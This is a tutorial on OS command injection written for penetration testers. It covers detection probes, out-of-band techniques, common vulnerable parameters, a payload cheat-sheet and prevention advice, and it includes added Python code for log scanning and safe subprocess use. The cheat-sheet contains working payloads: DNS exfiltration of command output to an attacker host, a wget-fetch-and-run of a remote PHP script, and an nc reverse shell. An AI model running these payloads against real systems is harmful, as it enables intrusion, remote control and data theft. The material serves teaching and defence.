
The Penetration Tester's Guide to Command Injection

Author: JIYIK   Last Updated: 2025/03/17

What is command injection?

Command injection is an attack whose goal is to execute arbitrary commands on the host operating system through a vulnerable application. These types of attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to the system shell. In such an attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Often, they are possible due to insufficient input validation.

This attack differs from code injection: in code injection the attacker supplies their own code, which the application then executes. In command injection, the attacker abuses the application's existing functionality to run system commands without supplying any code of their own.


What are the effects of command injection?

This vulnerability allows an attacker to run operating system commands with the privileges of the vulnerable application. Depending on the privileges of that user, it can lead to access to the system, disclosure of critical sensitive data, and ultimately complete takeover of the server or system.


How to detect and exploit them?

Assume that you are testing the parameters of the following URL during a penetration test:

https://vulnerable-website.com/endpoint?parameter=123

To detect whether the application is protected against command injection, we can try several methods:

Insert special characters to detect delimiters:

We can inject some special characters to see if the application blocks anything that could be used for command injection:

&
;
newline (0x0a or \n)
&&
|
||

If the application does not throw any error messages, we can try to inject our command after using one of these delimiters.

https://vulnerable-website.com/endpoint?parameter=1|whoami

Detecting blind operating system command injection

Time delay

Most operating system command injections are blind, meaning the application returns no output from the executed command. Once we know which special characters are allowed, we can confirm the injection with a time delay, as shown below:

https://vulnerable-website.com/endpoint?parameter=x||ping+-c+10+127.0.0.1||

Redirecting Output

We can also redirect the output of the command to a file under the web root and then retrieve that file through the browser. A payload similar to the following can be used:

https://vulnerable-website.com/endpoint?parameter=||whoami>/var/www/images/output.txt||

OOB (Out Of Band) Usage

We can also trigger OOB network interactions with external servers such as Burp Collaborator. We can use a payload similar to the following:

https://vulnerable-website.com/endpoint?parameter=x||nslookup+burp.collaborator.address||

Alternatively, we can use a payload similar to the following to leak the output of the command:

https://vulnerable-website.com/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||

The most common parameters that can be considered when testing for command injection are as follows:

  • cmd
  • exec
  • command
  • execute
  • ping
  • query
  • jump
  • code
  • reg
  • do
  • func
  • arg
  • option
  • load
  • process
  • step
  • read
  • function
  • req
  • feature
  • exe
  • module
  • payload
  • run
  • print
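The probes described above leave a recognisable trace in web-server logs. The following is an added example (not from the original article) of a defender-side check: it URL-decodes each query parameter in constructed access-log lines, flags values containing the delimiters listed earlier, and marks whether the parameter name is one of the common ones just listed. The log format and function names are assumptions.

```python
from urllib.parse import urlsplit, parse_qsl

# Shell delimiters from the list above. Two-character forms come first so
# the report shows "||" rather than only "|".
METACHARS = ["||", "&&", "|", "&", ";", "\n", "`", "$("]

# Parameter names the article lists as common injection points; used only
# to prioritise findings in triage.
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
    "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
    "function", "req", "feature", "exe", "module", "payload", "run", "print",
}

# Constructed sample access-log lines (METHOD PATH STATUS), not real traffic.
# A raw '&' in a query string is a parameter separator, so an injected
# ampersand only survives decoding when it was sent encoded (%26).
SAMPLE_LOG = """\
GET /endpoint?parameter=123 200
GET /endpoint?parameter=1|whoami 200
GET /endpoint?parameter=x||ping+-c+10+127.0.0.1|| 200
GET /endpoint?parameter=||whoami>/var/www/images/output.txt|| 200
GET /endpoint?cmd=127.0.0.1%0aid 200
GET /endpoint?exec=1%26%26id 200
GET /search?q=red%20shoes 200
"""

def find_metachars(value: str) -> list[str]:
    """Return the delimiters present in one URL-decoded parameter value."""
    return [m for m in METACHARS if m in value]

def scan_request_line(line: str) -> list[dict]:
    """Decode the query string of one log line and flag every parameter
    value that contains a shell delimiter."""
    method, path, status = line.split()
    findings = []
    # keep_blank_values: a bare '||' must not be dropped as an empty value
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        hits = find_metachars(value)
        if hits:
            findings.append({"param": name, "value": value, "metachars": hits,
                             "well_known_param": name in SUSPECT_PARAMS})
    return findings

def scan_log(text: str) -> list[tuple[str, list[dict]]]:
    """Run the check over every non-empty line; keep lines with findings."""
    results = [(ln, scan_request_line(ln)) for ln in text.splitlines() if ln.strip()]
    return [(ln, f) for ln, f in results if f]
```

Running `scan_log(SAMPLE_LOG)` flags five of the seven sample lines; the `%0a` and `%26%26` cases show why the check must run on the decoded value rather than the raw request line.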

Notes

Special characters

&
;
newline (0x0a or \n)
&&
|
||
`command`
$(command)

Linux command:

whoami
ifconfig
ls
uname -a

Windows command:

whoami
ipconfig
dir
ver

Supported by both Unix and Windows

ls||id; ls ||id; ls|| id; ls || id 
ls|id; ls |id; ls| id; ls | id 
ls&&id; ls &&id; ls&& id; ls && id 
ls&id; ls &id; ls& id; ls & id 
ls %0A id

Time delay command

& ping -c 10 127.0.0.1 &

Redirecting Output

& whoami > /var/www/images/output.txt &

OOB (Out Of Band) Usage

& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &

Bypassing WAF

vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload

How to prevent it?

There are many ways to prevent this vulnerability. Here are a few suggestions:

  • Avoid using shell execution functions. If unavoidable, limit their use to very specific use cases.
  • Perform proper input validation when passing user input into the shell to execute commands.
  • Use secure APIs when accepting user input into your application.
  • Escape special characters when a secure API is not available.
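The four suggestions above, as an added Python example that is not from the original article: the vulnerable shell-string pattern next to a hardened version that validates the host against an allow-list and passes an argument list with no shell involved, plus `shlex.quote` for the case where a shell string is unavoidable. The ping use case and all function names are assumptions.

```python
import ipaddress
import re
import shlex
import subprocess

# Hostname allow-list: labels of letters, digits and hyphens joined by dots.
# This excludes every delimiter in the list above (&, ;, newline, |, ` and $( ).
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")

def is_valid_host(value: str) -> bool:
    """Accept an IP address literal or a syntactically valid hostname only."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    # fullmatch (not match/$) so a trailing newline cannot slip through
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None

def ping_vulnerable(host: str) -> str:
    """The vulnerable pattern: user input spliced into a shell command line.
    With host = '127.0.0.1|whoami' the shell runs whoami as a second command.
    Shown for contrast; the string is returned here, not executed."""
    return f"ping -c 1 {host}"   # would be passed to subprocess.run(shell=True)

def build_ping_argv(host: str) -> list[str]:
    """Hardened: validate, then pass an argument list. With no shell involved
    the value is one argv entry whatever characters it contains."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]

def run_ping(host: str) -> subprocess.CompletedProcess:
    """shell=False (the default): argv goes straight to execve, no shell parsing."""
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=10)

def shell_safe_ping_command(host: str) -> str:
    """When a shell string is unavoidable, quote the value so delimiters are
    literal text. Quoting complements validation; it does not replace it."""
    return "ping -c 1 " + shlex.quote(host)

if __name__ == "__main__":
    print(ping_vulnerable("127.0.0.1|whoami"))          # one shell line, two commands
    print(build_ping_argv("127.0.0.1"))                 # ['ping', '-c', '1', '127.0.0.1']
    print(shell_safe_ping_command("127.0.0.1|whoami"))  # ping -c 1 '127.0.0.1|whoami'
```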
